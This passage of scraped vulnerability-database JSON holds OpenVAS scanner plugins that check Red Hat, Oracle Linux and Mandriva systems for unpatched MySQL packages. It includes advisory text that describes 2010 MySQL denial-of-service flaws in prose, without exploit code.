\"CVE-2010-3840\");\n script_name(\"RedHat Update for mysql RHSA-2010:0825-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.77~4.el5_5.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.77~4.el5_5.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-debuginfo\", rpm:\"mysql-debuginfo~5.0.77~4.el5_5.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-devel\", rpm:\"mysql-devel~5.0.77~4.el5_5.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-server\", rpm:\"mysql-server~5.0.77~4.el5_5.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-test\", rpm:\"mysql-test~5.0.77~4.el5_5.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-11T11:04:12", "references": ["2010:0825-01", "https://www.redhat.com/archives/rhsa-announce/2010-November/msg00003.html"], "pluginID": "1361412562310870356", "description": "Check for the Version of mysql", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-11-16T00:00:00", "title": "RedHat Update for mysql RHSA-2010:0825-01", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3836", "CVE-2010-3677", "CVE-2010-3838"], "modified": "2018-01-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870356", "id": "OPENVAS:1361412562310870356", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for mysql RHSA-2010:0825-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"MySQL is a multi-user, multi-threaded SQL database server. It consists of\n the MySQL server daemon (mysqld) and many client programs and libraries.\n\n It was found that the MySQL PolyFromWKB() function did not sanity check\n Well-Known Binary (WKB) data. A remote, authenticated attacker could use\n specially-crafted WKB data to crash mysqld. This issue only caused a\n temporary denial of service, as mysqld was automatically restarted after\n the crash. (CVE-2010-3840)\n \n A flaw was found in the way MySQL processed certain JOIN queries. If a\n stored procedure contained JOIN queries, and that procedure was executed\n twice in sequence, it could cause an infinite loop, leading to excessive\n CPU use (up to 100%). A remote, authenticated attacker could use this flaw\n to cause a denial of service. (CVE-2010-3839)\n \n A flaw was found in the way MySQL processed queries that provide a mixture\n of numeric and longblob data types to the LEAST or GREATEST function. A\n remote, authenticated attacker could use this flaw to crash mysqld. This\n issue only caused a temporary denial of service, as mysqld was\n automatically restarted after the crash. (CVE-2010-3838)\n \n A flaw was found in the way MySQL processed PREPARE statements containing\n both GROUP_CONCAT and the WITH ROLLUP modifier. A remote, authenticated\n attacker could use this flaw to crash mysqld. This issue only caused a\n temporary denial of service, as mysqld was automatically restarted after\n the crash. (CVE-2010-3837)\n \n It was found that MySQL did not properly pre-evaluate LIKE arguments in\n view prepare mode. A remote, authenticated attacker could possibly use this\n flaw to crash mysqld. (CVE-2010-3836)\n \n A flaw was found in the way MySQL processed statements that assign a value\n to a user-defined variable and that also contain a logical value\n evaluation. A remote, authenticated attacker could use this flaw to crash\n mysqld. This issue only caused a temporary denial of service, as mysqld was\n automatically restarted after the crash. (CVE-2010-3835)\n \n A flaw was found in the way MySQL evaluated the arguments of extreme-value\n functions, such as LEAST and GREATEST. A remote, authenticated attacker\n could use this flaw to crash mysqld. This issue only caused a temporary\n denial of service, as mysqld was automatically restarted after the crash.\n (CVE-2010-3833)\n \n A flaw was found in the way MySQL processed EXPLAIN statements for some\n complex SELECT queries. A remote, authenticated attacker could use this\n flaw to crash mysqld. This issue only caused a temporary denial of servic ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"mysql on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-November/msg00003.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870356\");\n script_version(\"$Revision: 8356 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-10 09:00:39 +0100 (Wed, 10 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"RHSA\", value: \"2010:0825-01\");\n script_cve_id(\"CVE-2010-3677\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3833\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n script_name(\"RedHat Update for mysql RHSA-2010:0825-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.77~4.el5_5.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.77~4.el5_5.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-debuginfo\", rpm:\"mysql-debuginfo~5.0.77~4.el5_5.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-devel\", rpm:\"mysql-devel~5.0.77~4.el5_5.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-server\", rpm:\"mysql-server~5.0.77~4.el5_5.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-test\", rpm:\"mysql-test~5.0.77~4.el5_5.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-28T18:25:26", "references": ["http://linux.oracle.com/errata/ELSA-2010-0825.html"], "pluginID": "1361412562310122299", "description": "Oracle Linux Local Security Checks ELSA-2010-0825", "edition": 5, "reporter": "Eero Volotinen", "published": "2015-10-06T00:00:00", "title": "Oracle Linux Local Check: ELSA-2010-0825", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3836", "CVE-2010-3677", "CVE-2010-3838"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122299", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122299", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2010-0825.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122299\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:16:15 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2010-0825\");\n script_tag(name:\"insight\", value:\"ELSA-2010-0825 - mysql security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2010-0825\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2010-0825.html\");\n script_cve_id(\"CVE-2010-3677\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3833\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3839\", \"CVE-2010-3840\", \"CVE-2010-3838\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.77~4.el5_5.4\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.77~4.el5_5.4\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-devel\", rpm:\"mysql-devel~5.0.77~4.el5_5.4\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-server\", rpm:\"mysql-server~5.0.77~4.el5_5.4\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-test\", rpm:\"mysql-test~5.0.77~4.el5_5.4\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-06T13:04:50", "references": ["http://lists.mandriva.com/security-announce/2010-11/msg00008.php", "2010:222"], "pluginID": "1361412562310831243", "description": "Check for the Version of mysql", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-11-16T00:00:00", "title": "Mandriva Update for mysql MDVSA-2010:222 (mysql)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Mandrake Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3836", "CVE-2010-3677", "CVE-2010-3834", "CVE-2010-3838"], "modified": "2018-01-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831243", "id": "OPENVAS:1361412562310831243", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for mysql MDVSA-2010:222 (mysql)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities were discovered and corrected in mysql:\n\n * Joins involving a table with with a unique SET column could cause\n a server crash (CVE-2010-3677).\n \n * Use of TEMPORARY InnoDB tables with nullable columns could cause\n a server crash (CVE-2010-3680).\n \n * The server could crash if there were alternate reads from two\n indexes on a table using the HANDLER interface (CVE-2010-3681).\n \n * Using EXPLAIN with queries of the form SELECT ... UNION ... ORDER BY\n (SELECT ... WHERE ...) could cause a server crash (CVE-2010-3682).\n \n * During evaluation of arguments to extreme-value functions (such\n as LEAST() and GREATEST()), type errors did not propagate properly,\n causing the server to crash (CVE-2010-3833).\n \n * The server could crash after materializing a derived table that\n required a temporary table for grouping (CVE-2010-3834).\n \n * A user-variable assignment expression that is evaluated in a logical\n expression context can be precalculated in a temporary table for GROUP\n BY. However, when the expression value is used after creation of the\n temporary table, it was re-evaluated, not read from the table and a\n server crash resulted (CVE-2010-3835).\n \n * Pre-evaluation of LIKE predicates during view preparation could\n cause a server crash (CVE-2010-3836).\n \n * GROUP_CONCAT() and WITH ROLLUP together could cause a server crash\n (CVE-2010-3837).\n \n * Queries could cause a server crash if the GREATEST() or LEAST()\n function had a mixed list of numeric and LONGBLOB arguments, and\n the result of such a function was processed using an intermediate\n temporary table (CVE-2010-3838).\n \n * Queries with nested joins could cause an infinite loop in the\n server when used from stored procedures and prepared statements\n (CVE-2010-3839).\n \n * The PolyFromWKB() function could crash the server when improper\n WKB data was passed to the function (CVE-2010-3840).\n \n Additionally the default behaviour of using the mysqlmanager instead\n of the mysqld_safe script has been reverted in the SysV init script\n because of instability issues with the mysqlmanager.\n \n Packages for 2009.0 are provided as of the Extended Maintenance\n Program. Please visit this link to learn more:\n http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490\n \n The updated packages have been upgraded to mysql 5.0.91 and patched\n to correct these issues.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"mysql on Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-11/msg00008.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831243\");\n script_version(\"$Revision: 8287 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-04 08:28:11 +0100 (Thu, 04 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDVSA\", value: \"2010:222\");\n script_cve_id(\"CVE-2010-3677\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3833\", \"CVE-2010-3834\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n script_name(\"Mandriva Update for mysql MDVSA-2010:222 (mysql)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmysql15\", rpm:\"libmysql15~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-devel\", rpm:\"libmysql-devel~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-static-devel\", rpm:\"libmysql-static-devel~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-client\", rpm:\"mysql-client~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common\", rpm:\"mysql-common~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-doc\", rpm:\"mysql-doc~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-max\", rpm:\"mysql-max~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-extra\", rpm:\"mysql-ndb-extra~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-management\", rpm:\"mysql-ndb-management~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-storage\", rpm:\"mysql-ndb-storage~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-tools\", rpm:\"mysql-ndb-tools~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql15\", rpm:\"lib64mysql15~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-devel\", rpm:\"lib64mysql-devel~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-static-devel\", rpm:\"lib64mysql-static-devel~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmysql15\", rpm:\"libmysql15~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-devel\", rpm:\"libmysql-devel~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-static-devel\", rpm:\"libmysql-static-devel~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-client\", rpm:\"mysql-client~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common\", rpm:\"mysql-common~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-doc\", rpm:\"mysql-doc~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-max\", rpm:\"mysql-max~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-extra\", rpm:\"mysql-ndb-extra~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-management\", rpm:\"mysql-ndb-management~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-storage\", rpm:\"mysql-ndb-storage~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-tools\", rpm:\"mysql-ndb-tools~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql15\", rpm:\"lib64mysql15~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-devel\", rpm:\"lib64mysql-devel~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-static-devel\", rpm:\"lib64mysql-static-devel~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-12-15T11:57:47", "references": ["http://lists.mandriva.com/security-announce/2010-11/msg00008.php", "2010:222"], "pluginID": "831243", "description": "Check for the Version of mysql", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-11-16T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Mandriva Update for mysql MDVSA-2010:222 (mysql)", "type": "openvas", "naslFamily": "Mandrake Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3836", "CVE-2010-3677", "CVE-2010-3834", "CVE-2010-3838"], "modified": "2017-12-15T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=831243", "id": "OPENVAS:831243", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for mysql MDVSA-2010:222 (mysql)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities were discovered and corrected in mysql:\n\n * Joins involving a table with with a unique SET column could cause\n a server crash (CVE-2010-3677).\n \n * Use of TEMPORARY InnoDB tables with nullable columns could cause\n a server crash (CVE-2010-3680).\n \n * The server could crash if there were alternate reads from two\n indexes on a table using the HANDLER interface (CVE-2010-3681).\n \n * Using EXPLAIN with queries of the form SELECT ... UNION ... ORDER BY\n (SELECT ... WHERE ...) could cause a server crash (CVE-2010-3682).\n \n * During evaluation of arguments to extreme-value functions (such\n as LEAST() and GREATEST()), type errors did not propagate properly,\n causing the server to crash (CVE-2010-3833).\n \n * The server could crash after materializing a derived table that\n required a temporary table for grouping (CVE-2010-3834).\n \n * A user-variable assignment expression that is evaluated in a logical\n expression context can be precalculated in a temporary table for GROUP\n BY. However, when the expression value is used after creation of 